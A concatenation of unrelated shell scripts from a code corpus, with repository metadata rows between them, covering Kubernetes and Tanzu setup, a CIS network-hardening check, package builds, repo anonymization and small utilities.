run_util_script "jenkins/blue-green/bootstrap-k8s-blue-green.sh" \
--resource_group "$resource_group" \
--aks_name "$aks_name" \
--sp_subscription_id "$subscription_id" \
--sp_client_id "$app_id" \
--sp_client_password "$app_key" \
--sp_tenant_id "$tenant_id" \
--artifacts_location "$artifacts_location" \
--sas_token "$artifacts_location_sas_token"

# Create the blue/green sample job on the local Jenkins instance.
run_util_script "jenkins/blue-green/add-blue-green-job.sh" \
-j "http://localhost:8080/" \
-ju "admin" \
--aks_resource_group "$resource_group" \
--aks_name "$aks_name" \
--sp_subscription_id "$subscription_id" \
--sp_client_id "$app_id" \
--sp_client_password "$app_key" \
--sp_tenant_id "$tenant_id" \
--artifacts_location "$artifacts_location" \
--sas_token "$artifacts_location_sas_token"

# NOTE(review): temp_key_path/temp_pub_key are never assigned in this script —
# these removals appear to be leftovers from an earlier revision.
rm -f "$temp_key_path"
rm -f "$temp_pub_key"
| true
|
27f83e67580840f9ff8836f1c98f0c9b625092eb
|
Shell
|
petronny/aur3-mirror
|
/xmppjs-hg/PKGBUILD
|
UTF-8
| 841
| 2.53125
| 3
|
[] |
no_license
|
# Packager: Emmanuel Gil Peyrot <linkmauve@linkmauve.fr>
# PKGBUILD for the mercurial snapshot of xmpp.js, a server-side XMPP library
# for Node.js; installs the library under /usr/lib/node plus docs/examples.
pkgname=xmppjs-hg
pkgver=19
pkgrel=1
pkgdesc='xmpp.js is a server-side XMPP library for Node.js'
arch=('i686' 'x86_64')
provides=('xmppjs')
conflicts=('xmppjs')
url='http://xmppjs.prosody.im/'
# NOTE(review): PKGBUILD convention expects an array here — license=('MIT').
license='MIT'
depends=('nodejs' 'node-xml')
makedepends=('mercurial')
_hgroot="http://code.matthewwild.co.uk/"
_hgrepo="xmppjs"
build() {
cd $srcdir/$_hgrepo
# Point the library at the system-wide node-xml and sha1 modules.
sed -i 's,"./node-xml/lib/node-xml","node-xml",; s,"./sha1","sha1",' xmpp.js
mkdir -p $pkgdir/usr/lib/node/
install -Dm0644 *.js $pkgdir/usr/lib/node/
# Rewrite the examples to require the installed module name.
sed -i 's,"../xmpp","xmpp",' examples/*
mkdir -p $pkgdir/usr/share/$_hgrepo/examples/
install -Dm0644 examples/* $pkgdir/usr/share/$_hgrepo/examples/
install -Dm0644 COPYING $pkgdir/usr/share/licenses/$_hgrepo/COPYING
install -Dm0644 README.markdown $pkgdir/usr/share/$_hgrepo/README.markdown
}
| true
|
61eb649a11bdb632b7e9d502b101d8ebc0f404fc
|
Shell
|
threeworld/Security-baseline
|
/Linux/主机安全基线脚本/CIS-LBK/DEBIAN_FAMILY_LBK/functions/recommendations/nix_ensure_source_routed_packets_not_accepted.sh
|
UTF-8
| 5,557
| 3.234375
| 3
|
[] |
no_license
|
#!/usr/bin/env sh
#
# CIS-LBK Recommendation Function
# ~/CIS-LBK/functions/recommendations/nix_ensure_source_routed_packets_not_accepted.sh
#
# Name Date Description
# ------------------------------------------------------------------------------------------------
# Eric Pinnell 10/22/20 Recommendation "Ensure source routed packets are not accepted"
# Eric Pinnell 11/12/20 Modified "Updated tests to use sub-functions"
#
# Check — and remediate when needed — that source-routed packets are not
# accepted, per the CIS recommendation: net.ipv{4,6}.conf.{all,default}
# .accept_source_route must be 0 both in the running kernel and in the
# persisted sysctl conf files. IPv6 checks are skipped when IPv6 is disabled.
# Globals: RNA, LOG, ELOG, no_ipv6 (read); relies on helper ipv6_chk.
# Returns: 101 passed, 103 remediated, 106 manual, 102 failed (XCCDF codes).
ensure_source_routed_packets_not_accepted()
{
    echo "- $(date +%d-%b-%Y' '%T) - Starting $RNA" | tee -a "$LOG" 2>> "$ELOG"
    test="" test1="" test2="" test3="" test4="" test5="" test6="" test7="" test8=""
    # Helper: verify/remediate the IPv4 parameter $syspar in the running config.
    src4_chk_fix()
    {
        # Check IPv4 kernel parameter in running config
        t1=""
        echo "- $(date +%d-%b-%Y' '%T) - Checking $syspar in the running config" | tee -a "$LOG" 2>> "$ELOG"
        if sysctl "$syspar" | grep -Eq "^$syspar\s*=\s*$spv\b"; then
            t1=passed
        else
            echo "- $(date +%d-%b-%Y' '%T) - Remediating $syspar in the running config" | tee -a "$LOG" 2>> "$ELOG"
            sysctl -w "$syspar"="$spv"
            sysctl -w net.ipv4.route.flush=1
            sysctl "$syspar" | grep -Eq "^$syspar\s*=\s*$spv\b" && t1=remediated
        fi
    }
    # Helper: same as src4_chk_fix but flushes the IPv6 route table instead.
    src6_chk_fix()
    {
        # Check IPv6 kernel parameter in running config
        t1=""
        echo "- $(date +%d-%b-%Y' '%T) - Checking $syspar in the running config" | tee -a "$LOG" 2>> "$ELOG"
        if sysctl "$syspar" | grep -Eq "^$syspar\s*=\s*$spv\b"; then
            t1=passed
        else
            echo "- $(date +%d-%b-%Y' '%T) - Remediating $syspar in the running config" | tee -a "$LOG" 2>> "$ELOG"
            sysctl -w "$syspar"="$spv"
            sysctl -w net.ipv6.route.flush=1
            sysctl "$syspar" | grep -Eq "^$syspar\s*=\s*$spv\b" && t1=remediated
        fi
    }
    # Helper: verify/remediate the parameter (as regex $regpar, value $spv) in
    # the persisted sysctl conf files, rewriting in place or appending to
    # /etc/sysctl.d/cis_sysctl.conf when no file declares it.
    spif_chk_fix()
    {
        # Check kernel parameter in sysctl conf files
        t1=""
        echo "- $(date +%d-%b-%Y' '%T) - Checking $syspar in sysctl conf files" | tee -a "$LOG" 2>> "$ELOG"
        if grep -Elqs "^\s*$regpar\s*=\s*$spv\b" /etc/sysctl.conf /etc/sysctl.d/*.conf /usr/lib/sysctl.d/*.conf /run/sysctl.d/*.conf && ! grep -Elqs "^\s*$regpar\s*=\s*$nspv" /etc/sysctl.conf /etc/sysctl.d/*.conf /usr/lib/sysctl.d/*.conf /run/sysctl.d/*.conf; then
            t1=passed
        else
            echo "- $(date +%d-%b-%Y' '%T) - Remediating $syspar in sysctl conf files" | tee -a "$LOG" 2>> "$ELOG"
            grep -Els "$regpar\s*=" /etc/sysctl.conf /etc/sysctl.d/*.conf /usr/lib/sysctl.d/*.conf /run/sysctl.d/*.conf | while read -r filename; do
                sed -ri 's/^\s*(#\s*)?('"$regpar"'\s*=\s*)(\S+)(.*)?$/\2'"$spv"'/' "$filename"
            done
            if ! grep -Elqs "^\s*$regpar\s*=\s*$spv\b" /etc/sysctl.conf /etc/sysctl.d/*.conf /usr/lib/sysctl.d/*.conf /run/sysctl.d/*.conf; then
                echo "$syspar = $spv" >> /etc/sysctl.d/cis_sysctl.conf
            fi
            grep -Elqs "^\s*$regpar\s*=\s*$spv\b" /etc/sysctl.conf /etc/sysctl.d/*.conf /usr/lib/sysctl.d/*.conf /run/sysctl.d/*.conf && t1=remediated
        fi
    }
    # Check net.ipv4.conf.all.accept_source_route
    # Check net.ipv4.conf.all.accept_source_route in the running config
    syspar="net.ipv4.conf.all.accept_source_route"
    regpar="net\.ipv4\.conf\.all\.accept_source_route"
    spv="0"
    src4_chk_fix
    test1=$t1
    # Check net.ipv4.conf.all.accept_source_route in sysctl conf files
    spif_chk_fix
    test2=$t1
    # Check net.ipv4.conf.default.accept_source_route
    # Check net.ipv4.conf.default.accept_source_route in the running config
    syspar="net.ipv4.conf.default.accept_source_route"
    regpar="net\.ipv4\.conf\.default\.accept_source_route"
    spv="0"
    src4_chk_fix
    test3=$t1
    # Check net.ipv4.conf.default.accept_source_route in sysctl conf files
    spif_chk_fix
    test4=$t1
    # Check if IPv6 is enabled on the system
    [ -z "$no_ipv6" ] && ipv6_chk
    if [ "$no_ipv6" = yes ]; then
        echo "- $(date +%d-%b-%Y' '%T) - IPv6 is disabled, skipping IPv6 checks" | tee -a "$LOG" 2>> "$ELOG"
        test5=passed test6=passed test7=passed test8=passed
    else
        # Check net.ipv6.conf.all.accept_source_route
        # Check net.ipv6.conf.all.accept_source_route in the running config
        syspar="net.ipv6.conf.all.accept_source_route"
        regpar="net\.ipv6\.conf\.all\.accept_source_route"
        spv="0"
        src6_chk_fix
        test5=$t1
        # Check net.ipv6.conf.all.accept_source_route conf files
        spif_chk_fix
        test6=$t1
        # Check net.ipv6.conf.default.accept_source_route
        # Check net.ipv6.conf.default.accept_source_route in the running config
        syspar="net.ipv6.conf.default.accept_source_route"
        regpar="net\.ipv6\.conf\.default\.accept_source_route"
        spv="0"
        src6_chk_fix
        test7=$t1
        # Check net.ipv6.conf.default.accept_source_route in sysctl conf files
        spif_chk_fix
        test8=$t1
    fi
    # Check status of tests: all eight passed => no change needed; any other
    # combination of set values means at least one remediation was applied.
    if [ -n "$test1" ] && [ -n "$test2" ] && [ -n "$test3" ] && [ -n "$test4" ] && [ -n "$test5" ] && [ -n "$test6" ] && [ -n "$test7" ] && [ -n "$test8" ]; then
        if [ "$test1" = passed ] && [ "$test2" = passed ] && [ "$test3" = passed ] && [ "$test4" = passed ] && [ "$test5" = passed ] && [ "$test6" = passed ] && [ "$test7" = passed ] && [ "$test8" = passed ]; then
            test=passed
        else
            test=remediated
        fi
    fi
    # Set return code and return
    case "$test" in
        passed)
            echo "Recommendation \"$RNA\" No remediation required" | tee -a "$LOG" 2>> "$ELOG"
            return "${XCCDF_RESULT_PASS:-101}"
            ;;
        remediated)
            echo "Recommendation \"$RNA\" successfully remediated" | tee -a "$LOG" 2>> "$ELOG"
            return "${XCCDF_RESULT_PASS:-103}"
            ;;
        manual)
            echo "Recommendation \"$RNA\" requires manual remediation" | tee -a "$LOG" 2>> "$ELOG"
            return "${XCCDF_RESULT_FAIL:-106}"
            ;;
        *)
            echo "Recommendation \"$RNA\" remediation failed" | tee -a "$LOG" 2>> "$ELOG"
            return "${XCCDF_RESULT_FAIL:-102}"
            ;;
    esac
}
| true
|
e6a51ac98df72ec2ee2bb9ee463a4b75d1c1fc07
|
Shell
|
cnamejj/cli-tools
|
/check-repo-hash
|
UTF-8
| 263
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
# Compare the local HEAD commit with origin's HEAD and report whether the
# checkout is up to date. The unquoted array assignment word-splits the
# "hash<TAB>HEAD" line from ls-remote, leaving the hash in rehash[0];
# ${rehash%?HEAD} additionally strips a trailing "<char>HEAD" if present.
rehash=( $(git ls-remote $(git config --get remote.origin.url) HEAD) )
lohash="$(git rev-parse HEAD)"
[ "${rehash%?HEAD}" = "${lohash}" ] && echo "up to date, both ${rehash%?HEAD}" || echo "version mismatch, local ${lohash} remote ${rehash%?HEAD}"
| true
|
b70acd0af87748e41db7d929e1a4826494723ec5
|
Shell
|
ViralChris/eDNA_metabarcoding
|
/01_scripts/obiannotate_unident.sh
|
UTF-8
| 1,012
| 3.578125
| 4
|
[] |
no_license
|
#!/bin/bash
# For LSU, annotate the '_unidentified.fq' files with sample IDs in the fasta header before concatenating all together
# The output will be $OUTPUT_FOLDER/merged_data_assi.fa
# Global variables
SAMPLE_FOLDER="04_samples"
OUTPUT_FOLDER="04b_annotated_samples"
# issue: if run twice, it will redo on top of the new files because of ambiguity in filename
# HAB-9-18S_S98_L001_R1_assi_diat.fq
# vs
# HAB-9-18S_S98_L001_R1_assi_diat_sannot.fq
# Annotate the merged files with the sample name: list the inputs, strip the
# fixed suffix and the directory to derive each sample name, de-duplicate,
# then tag each record via obiannotate. (The mid-pipeline comment below is
# legal: bash allows a comment and newline directly after the '|'.)
ls -1 $SAMPLE_FOLDER/*_unidentified.fq | \
perl -pe 's/\_L001\_R1\_unidentified\.fq//' | \
# Remove the directory part of name
awk -F/ '{ print $2 }' - | \
sort -u | \
while read i
do
echo $i
# Run obiannotate with the sample name stored in the 'sample' attribute
obiannotate -S sample:"$i" $SAMPLE_FOLDER/$i"_L001_R1_unidentified.fq" > $SAMPLE_FOLDER/$i"_sannot.fq"
done
# Move files to merged folder separately for dino or diat
cat $SAMPLE_FOLDER/*_sannot.fq > $OUTPUT_FOLDER/merged_data_assi.fq
| true
|
6528d0b84a51bb8492e14033dcb43df0247bb983
|
Shell
|
adegomme/quantum-mobile
|
/setup_ansible.sh
|
UTF-8
| 574
| 3.546875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Generate the SSH config and Ansible inventory needed to run playbooks
# against the local Vagrant VM.
set -e
echo "### Parsing globalconfig.yml"
source other_stuff/yaml_parser.sh   # sourced for the parse_yaml function used below
eval $(parse_yaml globalconfig.yml)
# set up ssh config for ansible
vagrant ssh-config > vagrant-ssh
#sed -i"" "s/User vagrant/User ${vm_user}/g" vagrant-ssh
echo "### SSH config written to 'vagrant-ssh'"
echo "### Use e.g.: ssh -F vagrant-ssh default'"
# set up inventory file for ansible (heredoc content is written verbatim)
cat > hosts <<EOF
[vms:vars]
ansible_ssh_common_args= -F vagrant-ssh
# modify this line to switch to python2
ansible_python_interpreter=/usr/bin/python3
[vms]
default ansible_user=vagrant
EOF
| true
|
438cd3929b077d89c181a098047c23103cf4833e
|
Shell
|
jpmenil/dotfiles
|
/.zshrc
|
UTF-8
| 183
| 2.765625
| 3
|
[] |
no_license
|
# -*- sh -*-
# Minimal zsh entry point: source every fragment under $ZSH/rc, extend fpath
# with local completions/functions, then set the prompt.
ZSH=${ZSH:-${ZDOTDIR:-$HOME}/.config/zsh}
# Anonymous function keeps config_file out of the interactive scope.
() {
for config_file ($ZSH/rc/*.zsh) source $config_file
}
fpath=($ZSH/completions $ZSH/functions $fpath)
_jp_setprompt
| true
|
c3ea0f19ae3601bc40e3bd3aeceb8fbe60f6e719
|
Shell
|
cesar91/envasadoras
|
/shell_scripts/amex_shell.sh
|
WINDOWS-1250
| 1,656
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/sh
#===== SHELL SCRIPT AMEX T&E =====*
# Runs interfazAMEX.php and appends its output to shell_scripts/amex.log.
# The log file is removed twice a year (Jan 1st and Jul 1st) to bound its size.
#============== SFTP =============*
# (SFTP transfer currently disabled; authentication uses an SSH RSA key.)
#HOST="fsgateway.aexp.com"
#USER="MASNEGOCIO"
#PASS="msngco123"
#============== Date =============*
DAY=$(date --date='today' +%Y%m%d)
DATE=$(date --date='today' +%m%d)
#============== Paths ============*
SERVER_PATH="/usr/local/zend/apache2/htdocs/eexpensesv2_bmw"
PHP_PATH="/usr/local/zend/bin/php"
LOG_FILE="$SERVER_PATH/shell_scripts/amex.log"
#============== File =============*
EXPR="*"
FILE="BMW_DE_MEXICO_GL1025_${DAY}_${EXPR}"
FILE_LOCAL="$SERVER_PATH/amex/$FILE"
#FILE_SERVER="outbox/"$FILE
#============ Checksum ===========*
# (Former integrity check against the remote copy, kept for reference.)
#FILE_SIZE1=$(md5sum $FILE_SERVER | cut -d' ' -f1)
#FILE_SIZE2=$(md5sum $FILE_LOCAL | cut -d' ' -f1)
#===== Clear log each 6 months ====*
# Fix: the original if/elif branches performed the identical removal;
# collapse them into a single quoted test.
if [ "$DATE" = "0101" ] || [ "$DATE" = "0701" ]; then
    rm "$LOG_FILE"
fi
#====== Create log & Run PHP ======*
# Fix: both branches of the original if/else ran the same PHP command;
# only the log-file creation is conditional.
if [ ! -f "$LOG_FILE" ]; then
    touch "$LOG_FILE"
    # NOTE(review): 777 is overly permissive — confirm whether 644 suffices.
    chmod 777 "$LOG_FILE"
fi
"$PHP_PATH" "$SERVER_PATH/interfazAMEX.php" >> "$LOG_FILE"
#========== End Script ===========*
exit 0
#============= Cron ==============*
#30 23 * * * /usr/local/zend/apache2/htcocs/eexpensesv2/shell_scripts/amex_shell.sh
| true
|
18741bb41408aa3a0aaba9938ecb1dbe8fb9bf70
|
Shell
|
dtbinh/jSAM
|
/anonymyze.sh
|
UTF-8
| 1,384
| 3.734375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Publish an anonymized copy of this repository: clone the anonymous remote,
# replace its contents with the current working tree, scrub identifying
# names/emails/package paths, and push the result as one dated commit.

DST="anonymous"
GIT="git@github.com:anonc187/jCoCoA.git"

if [ -e "$DST" ]; then
  echo "Target folder $DST already exists"
  exit 1;
fi

# Clone git repository and commit under an anonymous identity
git clone "$GIT" "$DST"
git -C "$DST" config user.name "Anon Y. Mous"
git -C "$DST" config user.email anon187c@gmail.com

# Remove all content so we also will delete old files
# (the :? guard aborts instead of expanding to "/*" if DST were ever empty)
echo "Cleaning up old repository"
rm -rf "${DST:?}"/*

# Prepare folders
echo "Copying working folder to $DST"
mkdir -p "$DST/src/main/java/org/anon/cocoa/"
mkdir -p "$DST/src/test/java/org/anon/cocoa/"

# Copy folders
cp -r src/main/java/nl/coenvl/sam/* "$DST/src/main/java/org/anon/cocoa/."
cp -r src/test/java/nl/coenvl/sam/* "$DST/src/test/java/org/anon/cocoa/."

# Copy files (the word splitting of $FILES is intentional here)
FILES=".classpath .project .gitignore build.gradle LICENSE"
for f in $FILES; do
  cp "$f" "$DST/."
done

# Copy README without its last four (identifying) lines
# NOTE(review): 'head -n -4' is GNU-specific and fails on BSD/macOS head.
head -n -4 README.md > "$DST/README.md"

# Anonymize every Java source plus the top-level files. Fix: the original
# 'for f in `find ...`' word-split paths; read the file list line by line
# instead, and quote all expansions. The sed order matters (most specific
# patterns first, e.g. "Coen van Leeuwen" before "Coen").
echo "Anonymizing $DST"
{ find "$DST" -name '*.java'; find "$DST" -maxdepth 1 -type f; } |
while IFS= read -r f; do
  sed -i 's/nl.coenvl.sam/org.anon.cocoa/g' "$f"
  sed -i 's/coenvanl@gmail.com/anon187c@gmail.com/g' "$f"
  sed -i 's/c.j.vanleeuwen-2@tudelft.nl/anon187c@gmail.com/g' "$f"
  sed -i 's/Coen van Leeuwen/Anomymous/g' "$f"
  sed -i 's/leeuwencjv/Anomymous/g' "$f"
  sed -i 's/Coen/Anomymous/g' "$f"
  sed -i 's/TNO/Anonymous/g' "$f"
  sed -i 's/SAM/CoCoA/g' "$f"
done

# Commit and push
echo "Sending commits"
git -C "$DST" add -A
git -C "$DST" commit -m "$(date +%Y-%m-%d)"
git -C "$DST" push origin master
| true
|
0eb2b6ab213598ad17c46cfc5f028458ca598209
|
Shell
|
djbarcelos/script-install-setup
|
/files/Data/custom installation/script_custom.sh
|
UTF-8
| 327
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
# Demo "custom installation" script: prompts for a name, stores it in
# ./out.txt and prints the accumulated contents.
# --------------- Functions
# List everything under ../../../files relative to the current directory.
# NOTE(review): this shadows the shell builtin 'test' and is never called
# by main() — presumably a debugging leftover.
test () {
for FILE in ../../../files/*; do
echo $FILE;
done
}
# Prompt for a name on stdin, append it to ./out.txt, clear the screen and
# echo the accumulated names (the unquoted $(cat ...) collapses the file's
# newlines into spaces on output).
save () {
#tail -f /var/log/menssages > out
echo -n "Digitar nome: "
read name
echo $name >> ./out.txt
clear
echo $(cat ./out.txt)
}
# --------------- Main
# Entry point: show a banner, record one name via save(), then wait for a
# keypress before returning.
main () {
clear
echo "custom install"
save
read aa
}
main
| true
|
a495d1da0327f4d0f3576bf475c5dd69e359cd37
|
Shell
|
crdant/bootstrap-for-k8s
|
/bin/setup
|
UTF-8
| 4,688
| 3.53125
| 4
|
[] |
no_license
|
#! /usr/bin/env bash
# Bootstrap a local Kubernetes cluster and install Tanzu Application Service.
set -euo pipefail

# Resolve project-relative directories from this script's own location.
script_dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" > /dev/null 2>&1 && pwd)"
project_dir=${script_dir}/..
config_dir=${project_dir}/config
overlay_dir=${project_dir}/overlays
secrets_dir=${project_dir}/secrets
work_dir=${project_dir}/work
product_dir="${work_dir}/tanzu-application-service"
# Orchestrate the full install: parse CLI flags, create and prepare the
# cluster, download and deploy TAS, then clean up decrypted secrets.
main() {
  # NOTE(review): $@ should normally be quoted ("$@") to preserve argument
  # word boundaries; kept as-is here.
  parse_args $@
  create_cluster
  prepare_cluster
  download_tas
  deploy_tas
  clean_up
}
# Parse command-line flags into globals: platform, domain, gcp_key_file,
# release_version. A keybase-encrypted key file (<file>.enc) is decrypted in
# place and 'decrypted' is flagged so clean_up can remove the plaintext.
# The set +u/-u dance lets the default apply when --platform was not given.
parse_args() {
  if [ $# -gt 0 ]; then
    while [ $# -gt 0 ]; do
      case $1 in
        --platform | -p)
          platform=${2}
          shift
          ;;
        --domain | -d)
          domain=${2}
          shift
          ;;
        --gcp-key-file | -g)
          gcp_key_file=${2}
          if [ -f ${gcp_key_file}.enc ] ; then
            cat ${gcp_key_file}.enc | keybase pgp decrypt > ${gcp_key_file}
            decrypted=true
          fi
          shift
          ;;
        --release | --release-version | -r)
          release_version=${2}
          shift
          ;;
        *)
          echo "Unrecognized option: $1" 1>&2
          exit 1
          ;;
      esac
      shift
    done
  fi
  set +u
  if [ -z "${platform}" ]; then
    platform="minikube"
  fi
  set -u
}
# Dispatch to the platform-specific creator function, named
# "create_<platform>_cluster", defaulting the platform to "minikube".
# Globals: platform (read/write)
create_cluster() {
  # ${platform:-} keeps this safe under 'set -u' even when parse_args
  # has not run yet.
  if [ -z "${platform:-}" ]; then
    platform="minikube"
  fi
  # Call the creator directly; the original routed through eval, which is
  # an unnecessary evaluation layer for a plain function call.
  "create_${platform}_cluster"
}
# Stand up a local minikube cluster sized for a TAS install and make the
# "tas" profile the active one.
create_minikube_cluster() {
  minikube start --profile tas --kubernetes-version v1.16.8 --container-runtime containerd \
    --cpus 6 --memory 10240 --disk-size 30gb
  minikube profile tas
}
# Install cluster prerequisites via vendir + ytt + kapp, deriving the MetalLB
# address pool from the DNS A record of $domain.
# Globals: domain, gcp_key_file, project_dir, config_dir (read)
# NOTE(review): pd pushes a directory that is never popped here.
prepare_cluster() {
  local static_ip="$(dig ${domain} +short)"
  pd ${project_dir}
  (
    vendir sync
    # Values reach ytt through YTT_TAS_PREPARE_* environment variables.
    export YTT_TAS_PREPARE_metallb__pools__default__cidr="${static_ip}/28"
    export YTT_TAS_PREPARE_metallb__memberlist__secretkey=$(openssl rand -base64 128)
    export YTT_TAS_PREPARE_certmanager__solver__clouddns__keyfile="$(cat ${gcp_key_file})"
    # Deploy cluster prepartion
    kapp deploy -a prepare -f <( ytt -f ${config_dir} \
      --file-mark "_github.com/**/*:type=yaml-plain" \
      --file-mark "_github.com/**/*/LICENSE:type=text-plain" \
      --data-values-env YTT_TAS_PREPARE ) -y
  )
}
# Log in to Pivotal Network with the decrypted API token and download the
# TAS-for-Kubernetes product tar (latest release unless --release was given),
# unpacking it into $product_dir.
# Globals: secrets_dir, work_dir, product_dir, release_version (read/write)
download_tas() {
  local api_token=$(cat ${secrets_dir}/api-token.enc | keybase pgp decrypt)
  pivnet login --api-token ${api_token}
  local product_slug='pas-for-kubernetes'
  set +u
  if [ -z "${release_version}" ]; then
    # "Latest" = release with the most recently updated software files.
    release_version=$(pivnet releases --product-slug ${product_slug} --format json | jq -r '. | sort_by(.software_files_updated_at) | reverse | .[0].version')
  fi
  set -u
  pivnet download-product-files --product-slug='pas-for-kubernetes' \
    --release-version="${release_version}" \
    --download-dir ${work_dir} \
    --glob '*.tar'
  rm -rf ${product_dir}/*
  tar -C ${product_dir} -xf ${work_dir}/tanzu-application-service.${release_version}-*.tar
  rm ${work_dir}/tanzu-application-service.${release_version}-*.tar
  # NOTE(review): relocates the loadbalancer-replacement overlay out of
  # custom-overlays into config-optional — confirm whether it should be
  # applied or merely kept available.
  mv ${product_dir}/custom-overlays/replace-loadbalancer-with-clusterip.yaml ${product_dir}/config-optional
  # cp ${overlay_dir}/* ${product_dir}/custom-overlays
}
# Generate the deployment values file (registry credentials, domain, GCP key)
# and run the TAS installer, then enable Docker images in CF.
# Globals: work_dir, secrets_dir, product_dir, domain, gcp_key_file (read)
deploy_tas() {
  local values_dir=${work_dir}/configuration-values
  if [ ! -d ${values_dir} ]; then
    mkdir ${values_dir}
  fi
  local values_file="${values_dir}/deployment-values.yml"
  local static_ip="$(dig '*.'${domain} +short)"
  pd ${product_dir}
  (
    # Registry credentials are decrypted on the fly and exported for ytt.
    export YTT_TAS_system_registry__hostname="registry.pivotal.io"
    export YTT_TAS_system_registry__username="$(cat ${secrets_dir}/pivnet.json.enc | keybase pgp decrypt | jq -r .username)"
    export YTT_TAS_system_registry__password="$(cat ${secrets_dir}/pivnet.json.enc | keybase pgp decrypt | jq -r .password)"
    # export YTT_TAS_istio_static_ip=${static_ip}
    bin/generate-values.sh -d "${domain}" -g "${gcp_key_file}" > ${values_file}
    bin/install-tas.sh ${values_dir}
  )
  pop
  enable_docker
}
# Remove the decrypted GCP key file, but only when this run actually
# decrypted one (parse_args sets 'decrypted' in that case).
# Bug fix: the original '[ -n ${decrypted} ]' left the unquoted expansion
# as the literal string "-n" when the variable was unset, which is always
# true — so the user's own key file was deleted on every run.
# Globals: decrypted, gcp_key_file (read)
clean_up () {
  if [ -n "${decrypted:-}" ]; then
    rm -f "${gcp_key_file:-}"
  fi
}
# Allow Docker-image-based apps in CF (needs a logged-in admin session,
# which cf_login establishes).
enable_docker() {
  cf_login
  cf enable-feature-flag diego_docker
}
# Log in to the deployed CF API as admin, reading the credentials from the
# generated deployment values file.
# NOTE(review): deploy_tas writes the values to
# ${work_dir}/configuration-values/deployment-values.yml, while this reads
# ${work_dir}/deployment-values.yml — confirm the path is also populated.
cf_login() {
  password=$(cat ${work_dir}/deployment-values.yml | yq read - cf_admin_password)
  system_domain=$(cat ${work_dir}/deployment-values.yml | yq read - system_domain)
  cf login -a https://api.${system_domain} -u admin -p ${password} -o system
}
# Show a one-line spinner for roughly $2 seconds (1-second sleeps); the
# counter is incremented by the i++ inside the substring-offset expansion.
# Arguments: $1 - description of what we are waiting for, $2 - seconds
pause_for() {
  message=${1}
  time=${2}
  i=1
  sp="/-\|"
  echo -n "Giving ${message} time to complete... "
  while [ ${i} -lt ${time} ];
  do
    printf "\b${sp:i++%${#sp}:1}"
    sleep 1
  done
  echo
}
# pushd wrapper that suppresses the directory-stack chatter.
# Bug fix: quote the expansion so directories with spaces work.
# Arguments: $1 - directory to enter
pd () {
  local directory=${1}
  pushd "${directory}" > /dev/null
}
# Quiet counterpart to pd(): return to the previous directory on the stack.
pop() {
  builtin popd > /dev/null
}
# Quote "$@" so arguments containing spaces reach main() intact.
main "$@"
| true
|
9f80a077d33c87e7342f60c1c0c4faf83cda1e81
|
Shell
|
mrworf/lr6-hacks
|
/movefiles.sh
|
UTF-8
| 671
| 4.1875
| 4
|
[] |
no_license
|
#!/bin/bash
# Move every file listed in $1 (one path per line, as produced by
# showfiles.sh) into directory $2, recreating each file's parent directory
# structure underneath it.
SRC=$1
DST=$2

if [[ -z $SRC || -z $DST ]]; then
  echo ""
  echo "Usage: $0 <output from showfiles.sh> <new dir for extras>"
  echo ""
  exit 255
fi

if [ ! -d "${DST}" ]; then
  mkdir -p "${DST}" || { echo "Cannot create $DST" ; exit 255 ; }
fi

echo "Moving files..."
# Read line-by-line; the '|| [ -n "$F" ]' also processes a final line that
# lacks a trailing newline.
while IFS="" read -r F || [ -n "$F" ]
do
  if [ ! -f "${F}" ]; then
    echo "File ${F} does not exist"
  else
    DIR="$(dirname "$F")"
    FILE="$(basename "$F")"   # (computed but currently unused)
    if [ ! -d "${DST}/${DIR}" ]; then
      mkdir -p "${DST}/${DIR}" || { echo "Cannot create $DIR in $DST" ; exit 1 ; }
    fi
    mv "$F" "${DST}/${DIR}" || { echo "Cannot move $F into $DST/$DIR" ; exit 2 ; }
  fi
done < "${SRC}"
echo "Done"
| true
|
ef6d32b4fbb4ba1422a72dea44131c59c6a3ec67
|
Shell
|
kooritea/electronic-wechat
|
/scripts/tar-all.sh
|
UTF-8
| 449
| 2.6875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Package the per-platform Electron build outputs under dist/ into tarballs.
cd dist
echo 'Start compressing for Mac OS X.'
tar zcf 'mac-osx.tar.gz' 'Electronic WeChat-darwin-x64'
echo 'Compressing for Mac OS X succeed.'
echo 'Start compressing for Linux x64.'
tar zcf 'linux-x64.tar.gz' 'electronic-wechat-linux-x64'
echo 'Compressing for Linux x64 succeed.'
echo 'Start compressing for Linux ia32.'
tar zcf 'linux-ia32.tar.gz' 'electronic-wechat-linux-ia32'
echo 'Compressing for Linux ia32 succeed.'
cd ..
| true
|
ca709ced530d680f85af65d7af7bd89b350afc82
|
Shell
|
Evertcolombia/C_sample_programs_and_Scripts
|
/docker_examples/bin_mount.sh
|
UTF-8
| 496
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
# Cheat-sheet for Docker bind mounts. The <...> tokens are placeholders, so
# these lines are meant to be copied and edited, not executed as-is.
#use the host filesystem and mount it on the container using -v flag with the run command.
sudo docker run -it -v <absolute_path>:<folder_path_or_new_folder_name> <image_name>
# To mount the file system as read-only, use ro flag.
sudo docker run -it -v <aboslute_path>:<folder_path_or_new_folder_name>:ro <image_name>
# Bind mount has some limitations and is dependent on the host’s file system. If a folder is accidentally deleted from the host, Docker can’t do anything.
| true
|
974eb28671c4597358c24906d34c1b8cdcbf2b14
|
Shell
|
stivalaa/EstimNetDirected
|
/src/Random123-1.09/examples/gencl.sh
|
UTF-8
| 1,755
| 3.796875
| 4
|
[] |
permissive
|
#!/bin/sh
# Run the C preprocessor on an OpenCL kernel to generate a C string array
# suitable for clCreateProgramWithSource. This allows us to create
# standalone OpenCL programs that do not depend on paths to the source
# tree (the programs will still run the OpenCL run-time compiler to
# compile the kernel, but the kernel is a string within the program, with
# no external include dependencies)
# Mark Moraes, D. E. Shaw Research
# indenting the cpp output makes errors from the OpenCL runtime compiler
# much more understandable. User can override with whatever they want.
# The classic BSD indent (yes, the one that lived in /usr/ucb/indent once)
# defaults to -br, but recent GNU indent versions do not. Both appear to
# accept -br, fortunately... (BSD indent does not accept -kr or -linux, alas)
PATH=$PATH:/usr/bin
export PATH
# GENCL_INDENT defaults to 'indent -br' when indent exists, else plain cat;
# the ':' no-op makes the ${VAR=default} assignments side-effect only.
